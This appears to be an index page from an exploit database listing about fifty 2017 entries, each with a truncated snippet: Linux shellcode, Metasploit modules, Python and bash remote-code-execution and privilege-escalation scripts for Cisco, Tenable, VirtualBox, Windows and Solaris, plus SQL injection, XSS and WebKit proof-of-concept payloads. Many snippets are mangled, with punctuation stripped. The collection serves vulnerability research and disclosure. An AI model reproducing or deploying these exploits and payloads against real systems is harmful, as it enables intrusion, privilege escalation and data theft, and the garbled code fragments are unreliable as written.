Linux/x86 - Egg-hunter Shellcode (18 bytes)

Linux/x86 - Egg-hunter Shellcode 18 bytes. Shellcode exploit for Linx86 platform // Description: a 18 bytes egg hunter on contigous memory segments // // You are free to do whatever you want of this shellcode // // @phacktul / global start section .text start: mov eax, start ; we set a valid .tex...

Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting

'use strict'; function spreada return ...a; let arr = Object.create1, 2, 3, 4; for let i = 0; i f.onload = null; try spreadf.contentWindow; catch e e.constructor.constructor'alertlocation'; ; f.src = 'https://abc.xyz/';...

Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting

jsCallee // newTarget may be an InternalFunction if we were called from Reflect.construct. JSFunction targetFunction = jsDynamicCastnewTarget; if LIKELYtargetFunction ... return targetFunction-rareDatavm-createInternalFunctionAllocationStructureFromBasevm, prototype, baseClass; ... else ... retur...

Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1086 There is a vulnerability in VirtualBox that permits an attacker with root privileges in a virtual machine with a NAT network interface to corrupt the memory of the userspace host process and leak memory contents from the...

Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1081 Windows: ManagementObject Arbitrary .NET Serialization RCE Platform: .NET 4.6, Powershell 4. Tested between Server 2016 and Windows 10 Anniversary Edition Class: Remote Code Execution Summary: Accessing a compromised WMI serve...

Microsoft Windows 10 - Runtime Broker ClipboardBroker Privilege Escalation

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1079 Windows: Runtime Broker ClipboardBroker EoP Platform: Windows 10 10586/14393 not tested 8.1 Update 2 Class: Elevation of Privilege Summary: The Runtime Broker’s Clipboard Broker allows any low IL/AppContainer such as Edge or I...

Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1093 Windows: IEETWCollector Arbitrary Directory/File Deletion EoP Platform: Windows 10 10586 not tested on anything else Class: Elevation of Privilege Summary: When cleaning up an ETW session the IEETWCollector service deletes i...

Oracle VM VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1136 This is a vulnerability that affects VirtualBox VMs that use a virtio network adapter which is a non-standard configuration. It permits the guest kernel to write up to 4GB of controlled data out of bounds in the trusted userla...

Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1103 VirtualBox: Windows Process COM Injection EoP Platform: VirtualBox v5.0.32 r112930 x64 Tested on Windows 10 Class: Elevation of Privilege Summary: The process hardening implemented by the VirtualBox driver can be circumvented ...

Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1141 This is another way to escalate from an unprivileged userspace process into the VirtualBox process, which has an open file descriptor to the privileged device /dev/vboxdrv and can use that to compromise the host kernel. The...

Oracle VM VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1091 This bug report describes two separate issues that, when combined, allow any user on a Linux host system on which VirtualBox is installed to gain code execution in the kernel. Since I'm not sure which one of these issues cross...

Huawei HG532n - Command Injection (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'base64' class MetasploitModule 'Huawei HG532n Command Injection', 'Description' = %q This module exploits a command injection vulnerability in...

Dmitry 1.3a - Local Buffer Overflow (PoC)

Exploit Title: DmitryDeepmagic Information Gathering Tool Local Stack Buffer Overflow CVE: CVE-2017-7938 CWE: CWE-119 Exploit Author: Hosein Askari FarazPajohan Vendor HomePage: http://mor-pah.net/software/dmitry-deepmagic-information-gathering-tool/ Version : 1.3a Unix Exploit Tested on: Parrot ...

Tenable Appliance < 4.5 - Root Remote Code Execution

!/bin/bash : ' According to http://static.tenable.com/proddocs/upgradeappliance.html they fixed two security vulnerabilities in the web interface in release 4.5 so I guess previous version are also vulnerable. Exploit Title: Unauthenticated remote root code execution on Tenable Appliance Date:...

pinfo 0.6.9 - Local Buffer Overflow (PoC)

Title: pinfo v0.6.9 - Local Buffer Overflow Author: Nassim Asrir Researcher at: Henceforth Author contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ CVE: N/A Download $ apt-get install pinfo POC For any Question or discussion about this vuln:...

Microsoft Word - '.RTF' Remote Code Execution

!/usr/bin/env python ''' Exploit toolkit CVE-2017-0199 - v4.0 https://github.com/bhdresh/CVE-2017-0199 Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41894.zip ''' import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile from random import randin...

Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework auxiliary/scanner/smb/smbms17010 require 'msf/core' class MetasploitModule 'MS17-010 SMB RCE Detection', 'Description' = %q Uses information disclosure to determine if...

Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset

Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt + ISR: ApparitionSec Vendor: ================ www.mantisbt.org Product: ================== Mantis Bug Tracker v1.3.0 /...

WinSCP 5.9.4 - 'LIST' Denial of Service (Metasploit)

Exploit Title: WinSCP 5.9.4 - LIST Command Denial of service Crush application Date: 4-4-2017 mm.dd.yy Exploit Author: M.Ibrahim [email protected] E-Mail: vulnbug gmail.com Vendor Home Page: https://winscp.net/eng/index.php Vendor download link: https://winscp.net/download/WinSCP-5.9.4-Setup.exe...

Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation

/ Title: Linux Kernel 4.8.0 udev 232 - Privilege Escalation Author: Nassim Asrir Researcher at: Henceforth Author contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ The full Research: https://www.facebook.com/asrirnassim/ CVE: CVE-2017-7874 Exp first of all we need...

Mozilla Firefox - Address Bar Spoofing

location=URL.createObjectURLnew Blob'Not Googleiflocation.href.indexOf"google"==-1location.pathname="https://www.google.com/"elsedocument.title="Google Search"', type: 'text/html'...

VirusChaser 8.0 - Local Buffer Overflow (SEH)

Exploit Title: Virus Chaser 8.0 - Scanner component, SEH Overflow Date: 14 April 2017 Exploit Author: 0x41Li [email protected] Vendor Homepage: https://www.viruschaser.com/ Software Link: https://www.viruschaser.com/download/VC80b32Setup.zip Tested on: Windows 7 Universal import os from struct...

Concrete5 CMS 8.1.0 - 'Host' Header Injection

Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt + ISR: ApparitionSec Vendor: ================== www.concrete5.org Product: ================ concrete5 v8.1.0 concrete5 is an...

Linux/x86-64 - execve("/bin/sh") Shellcode (31 bytes)

Linux/x86-64 - execve"/bin/sh" Shellcode 31 bytes. Shellcode exploit for Linx86-64 platform Hi, This time I wanna to submit a shellcode whose length is 31Bytes , It's tested on Linux x86-64 ;=========================================================== ===================== ; The MIT License ; ;...

Microsoft Windows Kernel - 'win32k.sys' Multiple 'NtGdiGetDIBitsInternal' System Call

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1078 We have discovered two bugs in the implementation of the win32k!NtGdiGetDIBitsInternal system call, which is a part of the graphic subsystem in all modern versions of Windows. The issues can potentially lead to kernel pool...

Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1192 We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 10 indirectly through the win32k!NtUserPaintMenuBar system call, or more specifically,...

Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'AlienVault USM/OSSIM API Command Execution', 'Description' = %q This module exploits an unauthenticated command injection in...

Adobe Creative Cloud Desktop Application < 4.0.0.185 - Local Privilege Escalation

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/ADOBE-CREATIVE-CLOUD-PRIVILEGE-ESCALATION.txt + ISR: apparitionSec Vendor: ============== www.adobe.com Product: ======================================== Adobe Creative Cloud...

GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation

!/bin/sh GNS-3 Mac OS-X LPE local root exploit ===================================== GNS-3 on OS-X bundles the "ubridge" binary as a setuid root file. This file can be used to read arbitary files using "-f" arguement but also as it runs as root can also write arbitrary files with "pcapfile"...

agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting

!-- Source: https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-005.txt Advisory ID: SYSS-2017-005 Product: agorum core Pro Manufacturer: agorum Software GmbH Affected Versions: 7.8.1.4-251 Tested Versions: 7.8.1.4-251 Vulnerability Type: Persistent Cross-Site Scripting...

agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery

!-- Source: https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-008.txt Advisory ID: SYSS-2017-008 Product: agorum core Pro Manufacturer: agorum Software GmbH Affected Versions: 7.8.1.4-251 Tested Versions: 7.8.1.4-251 Vulnerability Type: Cross-Site Request Forgery CWE-352...

Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution

!/usr/bin/python Author: Artem Kondratenko @artkond import socket import sys from time import sleep setcredless = True if lensys.argv 3: print sys.argv0 + ' host --set/--unset' sys.exit elif sys.argv2 == '--unset': setcredless = False elif sys.argv2 == '--set': pass else: print sys.argv0 + ' host...

Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution

Cisco Catalyst 2960 IOS 12.255SE1 - 'ROCEM' Remote Code Execution. CVE-2017-3881. Remote exploit for Hardware platform !/usr/bin/python Author: Artem Kondratenko @artkond import socket import sys from time import sleep setcredless = True if lensys.argv 3: print sys.argv0 + ' host --set/--unset'...

Solaris 7 < 11 (SPARC/x86) - 'EXTREMEPARR' dtappgather Privilege Escalation

!/bin/ksh Exploit PoC reverse engineered from EXTREMEPARR which provides local root on Solaris 7 - 11 x86 & SPARC. Uses a environment variable of setuid binary dtappgather to manipulate file permissions and create a user owned directory anywhere on the system as root. Can then add a shared object...

Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution

!/usr/bin/python Exploit Title: Cisco Catalyst 2960 - Buffer Overflow Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ Date: 04.10.2017 Exploit Author: https://twitter.com/artkond Vendor Homepage: https://www.cisco.com/ Version: IOS version...

Proxifier for Mac 2.17/2.18 - Privesc Escalation

Source: https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html Proxifier 2.18 also 2.17 and possibly some earlier version ships with a KLoader binary which it installs suid root the first time Proxifier is run. This binary serves a single purpose which is to load and...

MyBB smilie Module < 1.8.11 - 'pathfolder' Directory Traversal

Description: ============ product: MyBB Homepage: https://mybb.com/ vulnerable version: input'pathfolder'; Line 327 $dir = @opendirMYBBROOT.$path; if we input "pathfolder" to "../../bypass/smile",Directory Traversal success! ============ Fixed: ============ This vulnerability was fixed in version...

Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow

function x = 0 var a; function arguments function b var g = 1; a5; f; g; ; , unsigned int, unsigned int webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fcc73 4 0x10c2901ea in JSC::ScriptExecutable::...

Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element

child = mfirstChild removeBetweennullptr, child-nextSibling, child; notifyChildNodeRemovedthis, child; If the location hash value is set, the page will give focus to the associated element. However, if there is a stylesheet that has not been loaded yet, the focusing will be delayed until the...

WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection

============================================= MGC ALERT 2017-003 - Original release date: April 06, 2017 - Last revised: April 10, 2017 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 CVSS Base Score ============================================= I. VULNERABILITY -----------------------...

Proxifier for Mac 2.18 - Multiple Vulnerabilities

Source: https://www.securify.nl/advisory/SFY20170401/multiplelocalprivilegeescalationvulnerabilitiesinproxifierformac.html Abstract Multiple local privileges escalation vulnerabilities were found in the KLoader binary that ships with Proxifier. KLoader is responsible for loading a Kernel Extensio...

Horde Groupware Webmail 3/4/5 - Multiple Remote Code Executions

Source: https://blogs.securiteam.com/index.php/archives/3107 Vulnerabilities Summary The following advisory describes two 2 vulnerabilities found in Horde Groupware Webmail. Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and...

Brother MFC-J6520DW - Authentication Bypass / Password Change

ASCII hex -- md5 e.g. AuthCookie=c243a9ee18a9327bfd419f31e75e71c7 for 'test' password This information can be used to crack current password from exported cookie. Fix: Minimize network access to Brother MFC device or disable HTTPS interface. Confirmed vulnerable: MFC-J6973CDW MFC-J4420DW MFC-8710...

MyBB < 1.8.11 - 'email' MyCode Cross-Site Scripting

Description: ============ product:MyBB Homepage:https://mybb.com/ vulnerable version:1.8.11 Severity:High risk =============== Proof of Concept: ============= 1.post a thread or reply any thread ,write: email=2"onmouseover="alertdocument.locationhover me/email then when user’s mouse hover it,XSS...

Apple WebKit - 'Document::adoptNode' Use-After-Free

var s = document.body.appendChilddocument.createElement'script'; s.type = '0'; s.textContent = 'document.body.appendChildparent.i0'; var i0 = s.appendChilddocument.createElement'iframe'; s.type = ''; var f = document.body.appendChilddocument.createElement'iframe'; f.contentDocument.adoptNodei0;...

FAQ Script 3.1.3 - 'category_id' SQL Injection

Exploit Title: FAQ Script 3.1.3 - SQL Injection Google Dork: N/A Date: 11.04.2017 Vendor Homepage: http://www.phponly.com/ Software: http://www.phponly.com/faq.html Demo: http://www.phponly.com/demo/faq/ Version: 3.1.3 Tested on: Win7 x64, Kali Linux x64 Exploit Author: Ihsan Sencan Author Web:...

Social Directory Script 2.0 - SQL Injection

Exploit Title: Social Directory Script 2.0 - SQL Injection Google Dork: N/A Date: 11.04.2017 Vendor Homepage: http://www.phponly.com/ Software: http://www.phponly.com/Social-Directory.html Demo: http://www.phponly.com/demo/link/ Version: 2.0 Tested on: Win7 x64, Kali Linux x64 Exploit Author: Ihs...

Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1184 This bug report describes a vulnerability in memoryexchange that permits PV guest kernels to write to an arbitrary virtual address with hypervisor privileges. The vulnerability was introduced through a broken fix for...

MyClassifiedScript 5.1 - SQL Injection

Exploit Title: Classified Portal Software 5.1 - SQL Injection Google Dork: N/A Date: 11.04.2017 Vendor Homepage: http://www.myclassifiedscript.com/ Software: http://www.myclassifiedscript.com/demo.html Demo: http://www.clpage.com/ Version: 5.1 Tested on: Win7 x64, Kali Linux x64 Exploit Author:...

Apple WebKit - 'JSC::B3::Procedure::resetReachability' Use-After-Free

function for var i = 0; i 1000000; ++i const v = Array & 1 ? v : 1; typeof o = 'object'; ; !-- Asan Log: ================================================================= ==32191==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000099738 at pc 0x000106c7af16 bp 0x700006a57850 sp...